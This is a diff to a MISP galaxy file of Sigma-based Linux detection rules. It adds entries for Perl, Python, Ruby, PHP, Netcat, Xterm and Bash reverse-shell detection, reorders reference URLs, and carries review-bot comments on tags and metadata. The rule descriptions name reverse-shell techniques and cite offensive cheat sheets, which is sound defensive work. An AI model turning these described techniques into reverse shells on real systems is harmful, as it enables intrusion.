@@ -90102,9 +84861,9 @@
"logsource.category": "No established category",
"logsource.product": "qualys",
"refs": [
- "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists",
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
"https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
+ "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists",
"https://www.cisecurity.org/controls/cis-controls-list/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml"
],
@@ -90124,8 +84883,8 @@
"logsource.category": "No established category",
"logsource.product": "qualys",
"refs": [
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
"https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
"https://www.cisecurity.org/controls/cis-controls-list/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml"
],
@@ -90147,8 +84906,8 @@
"logsource.category": "No established category",
"logsource.product": "No established product",
"refs": [
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
"https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
"https://www.cisecurity.org/controls/cis-controls-list/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml"
],
@@ -90585,8 +85344,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/",
"https://linux.die.net/man/1/xclip",
+ "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml"
],
"tags": [
@@ -90653,8 +85412,8 @@
"logsource.product": "linux",
"refs": [
"https://linux.die.net/man/8/insmod",
- "https://man7.org/linux/man-pages/man8/kmod.8.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md",
+ "https://man7.org/linux/man-pages/man8/kmod.8.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml"
],
"tags": [
@@ -90757,8 +85516,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://imagemagick.org/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md",
+ "https://imagemagick.org/",
"https://linux.die.net/man/1/import",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml"
],
@@ -90859,10 +85618,10 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
+ "https://mn3m.info/posts/suid-vs-capabilities/",
+ "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/",
"https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099",
"https://man7.org/linux/man-pages/man8/getcap.8.html",
- "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/",
- "https://mn3m.info/posts/suid-vs-capabilities/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml"
],
"tags": [
@@ -90937,8 +85696,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html",
"https://blog.aquasec.com/container-security-tnt-container-attack",
+ "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_modify_system_firewall.yml"
],
"tags": [
@@ -90971,8 +85730,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://github.com/Neo23x0/auditd/blob/master/audit.rules",
"Self Experience",
+ "https://github.com/Neo23x0/auditd/blob/master/audit.rules",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml"
],
"tags": [
@@ -91005,8 +85764,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml"
],
"tags": [
@@ -91237,8 +85996,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://linux.die.net/man/1/wget",
"https://gtfobins.github.io/gtfobins/wget/",
+ "https://linux.die.net/man/1/wget",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml"
],
"tags": [
@@ -91614,9 +86373,9 @@
"logsource.product": "linux",
"refs": [
"https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md",
"https://linux.die.net/man/1/chage",
"https://man7.org/linux/man-pages/man1/passwd.1.html",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml"
],
"tags": [
@@ -91716,10 +86475,10 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://access.redhat.com/articles/4409591#audit-record-types-2",
"https://linux.die.net/man/8/pam_tty_audit",
- "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md",
+ "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing",
+ "https://access.redhat.com/articles/4409591#audit-record-types-2",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml"
],
"tags": [
@@ -91826,9 +86585,9 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://access.redhat.com/articles/4409591#audit-record-types-2",
- "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07",
"https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files",
+ "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07",
+ "https://access.redhat.com/articles/4409591#audit-record-types-2",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml"
],
"tags": [
@@ -91861,9 +86620,9 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan",
"https://book.hacktricks.xyz/shells/shells/linux",
+ "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml"
],
"tags": [
@@ -92020,8 +86779,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://redcanary.com/blog/ebpf-malware/",
"https://man7.org/linux/man-pages/man7/bpf-helpers.7.html",
+ "https://redcanary.com/blog/ebpf-malware/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_potential_susp_ebpf_activity.yml"
],
"tags": [
@@ -92166,9 +86925,9 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://linux.die.net/man/8/useradd",
- "https://digital.nhs.uk/cyber-alerts/2018/cc-2825",
"https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid",
+ "https://digital.nhs.uk/cyber-alerts/2018/cc-2825",
+ "https://linux.die.net/man/8/useradd",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_privileged_user_creation.yml"
],
"tags": [
@@ -92333,9 +87092,9 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://artkond.com/2017/03/23/pivoting-guide/",
"http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html",
"https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb",
+ "https://artkond.com/2017/03/23/pivoting-guide/",
"http://pastebin.com/FtygZ1cg",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml"
],
@@ -92369,8 +87128,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md",
"https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml"
],
"tags": [
@@ -92601,8 +87360,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml",
"https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c",
+ "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml"
],
"tags": [
@@ -92635,8 +87394,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://twitter.com/matthieugarin/status/1183970598210412546",
"https://www.openwall.com/lists/oss-security/2019/10/14/1",
+ "https://twitter.com/matthieugarin/status/1183970598210412546",
"https://access.redhat.com/security/cve/cve-2019-14287",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml"
],
@@ -92868,8 +87627,8 @@
"logsource.category": "file_event",
"logsource.product": "linux",
"refs": [
- "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/",
"https://www.makeuseof.com/how-to-install-and-use-doas/",
+ "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml"
],
"tags": [
@@ -93012,8 +87771,8 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://twitter.com/matthieugarin/status/1183970598210412546",
"https://www.openwall.com/lists/oss-security/2019/10/14/1",
+ "https://twitter.com/matthieugarin/status/1183970598210412546",
"https://access.redhat.com/security/cve/cve-2019-14287",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml"
],
@@ -93180,8 +87939,8 @@
"logsource.product": "linux",
"refs": [
"https://gtfobins.github.io/gtfobins/vimdiff/",
- "https://gtfobins.github.io/gtfobins/rvim/",
"https://gtfobins.github.io/gtfobins/vim/",
+ "https://gtfobins.github.io/gtfobins/rvim/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml"
],
"tags": [
@@ -93334,10 +88093,10 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://linuxhint.com/uninstall-debian-packages/",
- "https://linuxhint.com/uninstall_yum_package/",
- "https://sysdig.com/blog/mitre-defense-evasion-falco",
"https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command",
+ "https://linuxhint.com/uninstall-debian-packages/",
+ "https://sysdig.com/blog/mitre-defense-evasion-falco",
+ "https://linuxhint.com/uninstall_yum_package/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remove_package.yml"
],
"tags": [
@@ -93467,7 +88226,7 @@
"value": "Chmod Suspicious Directory"
},
{
- "description": "Detects python spawning a pretty tty",
+ "description": "Detects python spawning a pretty tty which could be indicative of potential reverse shell activity",
"meta": {
"author": "Nextron Systems",
"creation_date": "2022/06/03",
@@ -93534,6 +88293,30 @@
"uuid": "3be619f4-d9ec-4ea8-a173-18fdd01996ab",
"value": "Flush Iptables Ufw Chain"
},
+ {
+ "description": "Detects execution of the perl binary with the \"-e\" flag and common strings related to potential reverse shell activity",
+ "meta": {
+ "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/04/07",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_lnx_perl_reverse_shell.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.revshells.com/",
+ "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "259df6bc-003f-4306-9f54-4ff1a08fa38e",
+ "value": "Potential Perl Reverse Shell Execution"
+ },
{
"description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134",
"meta": {
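Review bot: the new Perl reverse shell cluster carries only `attack.execution` in `tags` and has no `related` array, whereas the Base64 User-Agent entry earlier in this patch pairs its `attack.t1071.001` tag with a `related` link to an ATT&CK pattern dest-uuid, and the Xterm and Netcat reverse shell entries added below pair `attack.t1059` with dest-uuid 7385dfaf-6886-4229-9ecd-6fd678040830. The Ruby, Python, PHP and Bash reverse shell clusters added further down have the same gap. Since the galaxy mirrors the upstream Sigma tags, the fix is to add the technique tag in the source rules (or to document that tactic-only tags are acceptable), not to hand-edit the JSON here.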
@@ -93577,10 +88360,44 @@
"uuid": "7fb14105-530e-4e2e-8cfb-99f7d8700b66",
"value": "Atlassian Confluence CVE-2022-26134"
},
+ {
+ "description": "Detects usage of \"xterm\" as a potential reverse shell tunnel",
+ "meta": {
+ "author": "@d4ns4n_",
+ "creation_date": "2023/04/24",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_lnx_xterm_reverse_shell.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.revshells.com/",
+ "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "4e25af4b-246d-44ea-8563-e42aacab006b",
+ "value": "Potential Xterm Reverse Shell"
+ },
{
"description": "Detects a suspicious curl process start the adds a file to a web request",
"meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "author": "Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update)",
"creation_date": "2022/09/15",
"falsepositive": [
"Scripts created by developers and admins"
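Review bot: the `author` change on the curl file-upload cluster appends "Cedric MAURUGEON (Update)", a convention that appears on no other `author` value in this patch, where co-authors are simply comma-separated (compare the Perl and Netcat entries: "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)"). Worth checking whether the "(Update)" suffix is intended metadata or should be normalised upstream. The unchanged description line in the same region still reads "a suspicious curl process start the adds a file", which should be "that adds"; that typo lives in the source rule as well.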
@@ -93590,11 +88407,11 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
+ "https://curl.se/docs/manpage.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file",
"https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html",
"https://twitter.com/d1r4c/status/1279042657508081664",
"https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76",
- "https://curl.se/docs/manpage.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml"
],
"tags": [
@@ -93622,6 +88439,30 @@
"uuid": "00b90cc1-17ec-402c-96ad-3a8117d7a582",
"value": "Suspicious Curl File Upload - Linux"
},
+ {
+ "description": "Detects execution of ruby with the \"-e\" flag and calls to \"socket\" related functions. This could be an indication of a potential attempt to setup a reverse shell",
+ "meta": {
+ "author": "@d4ns4n_",
+ "creation_date": "2023/04/07",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_lnx_ruby_reverse_shell.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.revshells.com/",
+ "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "b8bdac18-c06e-4016-ac30-221553e74f59",
+ "value": "Potential Ruby Reverse Shell"
+ },
{
"description": "Detects usage of \"apt\" and \"apt-get\" as a GTFOBin to execute and proxy command and binary execution",
"meta": {
@@ -93635,8 +88476,8 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://gtfobins.github.io/gtfobins/apt-get/",
"https://gtfobins.github.io/gtfobins/apt/",
+ "https://gtfobins.github.io/gtfobins/apt-get/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml"
],
"tags": [
@@ -93669,10 +88510,10 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://linuxize.com/post/how-to-delete-group-in-linux/",
"https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/",
"https://linux.die.net/man/8/userdel",
"https://www.cyberciti.biz/faq/linux-remove-user-command/",
+ "https://linuxize.com/post/how-to-delete-group-in-linux/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_userdel.yml"
],
"tags": [
@@ -94015,6 +88856,30 @@
"uuid": "b86d356d-6093-443d-971c-9b07db583c68",
"value": "Suspicious Curl Change User Agents - Linux"
},
+ {
+ "description": "Detects executing python with keywords related to network activity that could indicate a potential reverse shell",
+ "meta": {
+ "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/04/24",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_lnx_python_reverse_shell.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.revshells.com/",
+ "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "32e62bc7-3de0-4bb1-90af-532978fe42c0",
+ "value": "Potential Python Reverse Shell"
+ },
{
"description": "Detects suspicious sub processes of web server processes",
"meta": {
@@ -94028,8 +88893,8 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/",
"https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF",
+ "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml"
],
"tags": [
@@ -94129,8 +88994,8 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/",
"https://bpftrace.org/",
+ "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml"
],
"tags": [
@@ -94150,6 +89015,30 @@
"uuid": "f8341cb2-ee25-43fa-a975-d8a5a9714b39",
"value": "BPFtrace Unsafe Option Usage"
},
+ {
+ "description": "Detects usage of the PHP CLI with the \"-r\" flag which allows it to run inline PHP code. The rule looks for calls to the \"fsockopen\" function which allows the creation of sockets.\nAttackers often leverage this in combination with functions such as \"exec\" or \"fopen\" to initiate a reverse shell connection.\n",
+ "meta": {
+ "author": "@d4ns4n_",
+ "creation_date": "2023/04/07",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_lnx_php_reverse_shell.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.revshells.com/",
+ "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "c6714a24-d7d5-4283-a36b-3ffd091d5f7e",
+ "value": "Potential PHP Reverse Shell"
+ },
{
"description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n",
"meta": {
@@ -94281,10 +89170,10 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://linuxize.com/post/how-to-delete-group-in-linux/",
"https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/",
"https://linux.die.net/man/8/groupdel",
"https://www.cyberciti.biz/faq/linux-remove-user-command/",
+ "https://linuxize.com/post/how-to-delete-group-in-linux/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_groupdel.yml"
],
"tags": [
@@ -94317,8 +89206,8 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS",
"https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html",
+ "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml"
],
"tags": [
@@ -94351,9 +89240,9 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://github.com/diego-treitos/linux-smart-enumeration",
"https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes",
"https://github.com/carlospolop/PEASS-ng",
+ "https://github.com/diego-treitos/linux-smart-enumeration",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml"
],
"tags": [
@@ -94507,6 +89396,31 @@
"uuid": "3e102cd9-a70d-4a7a-9508-403963092f31",
"value": "Linux Network Service Scanning"
},
+ {
+ "description": "Detects execution of the bash shell with the interactive flag \"-i\".",
+ "meta": {
+ "author": "@d4ns4n_",
+ "creation_date": "2023/04/07",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_lnx_bash_interactive_shell.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.revshells.com/",
+ "https://linux.die.net/man/1/bash",
+ "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "6104e693-a7d6-4891-86cb-49a258523559",
+ "value": "Bash Interactive Shell"
+ },
{
"description": "Detects when the file \"passwd\" or \"shadow\" is copied from tmp path",
"meta": {
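Review bot: the Bash Interactive Shell cluster's `falsepositive` is "Unknown" although the description says it matches every bash invocation with "-i", which administrators and automation use routinely; `level: low` acknowledges that, but the false-positive field should state it explicitly (for example "Legitimate interactive sessions started by administrators or scripts"). This is upstream rule content, so the correction belongs in proc_creation_lnx_bash_interactive_shell.yml rather than in the generated JSON.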
@@ -94748,6 +89662,43 @@
"uuid": "21541900-27a9-4454-9c4c-3f0a4240344a",
"value": "OMIGOD SCX RunAsProvider ExecuteShellCommand"
},
+ {
+ "description": "Detects execution of netcat with the \"-e\" flag followed by common shells. This could be a sign of a potential reverse shell setup.",
+ "meta": {
+ "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/04/07",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_lnx_netcat_reverse_shell.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://man7.org/linux/man-pages/man1/ncat.1.html",
+ "https://www.infosecademy.com/netcat-reverse-shells/",
+ "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://www.revshells.com/",
+ "https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "7f734ed0-4f47-46c0-837f-6ee62505abd9",
+ "value": "Potential Netcat Reverse Shell Execution"
+ },
{
"description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments",
"meta": {
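Review bot: the `related` entry's `"dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830"` must agree with the `"attack.t1059"` tag in the same cluster, so please confirm it is the UUID of the T1059 entry in `clusters/mitre-attack-pattern.json` before merging; a mismatched dest-uuid silently breaks the galaxy relationship graph. The `estimative-language:likelihood-probability="almost-certain"` tag is the right form for this kind of technique link.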
@@ -94761,8 +89712,8 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://gtfobins.github.io/gtfobins/nohup/",
"https://www.computerhope.com/unix/unohup.htm",
+ "https://gtfobins.github.io/gtfobins/nohup/",
"https://en.wikipedia.org/wiki/Nohup",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml"
],
@@ -94873,10 +89824,10 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "Internal Research",
"https://github.com/Gui774ume/ebpfkit",
- "https://github.com/pathtofile/bad-bpf",
+ "Internal Research",
"https://github.com/carlospolop/PEASS-ng",
+ "https://github.com/pathtofile/bad-bpf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_hack_tools.yml"
],
"tags": [
@@ -94899,9 +89850,9 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
+ "https://bpftrace.org/",
"https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html",
"https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/",
- "https://bpftrace.org/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml"
],
"tags": [
@@ -94958,9 +89909,9 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/",
"https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144",
"https://blogs.blackberry.com/",
+ "https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml"
],
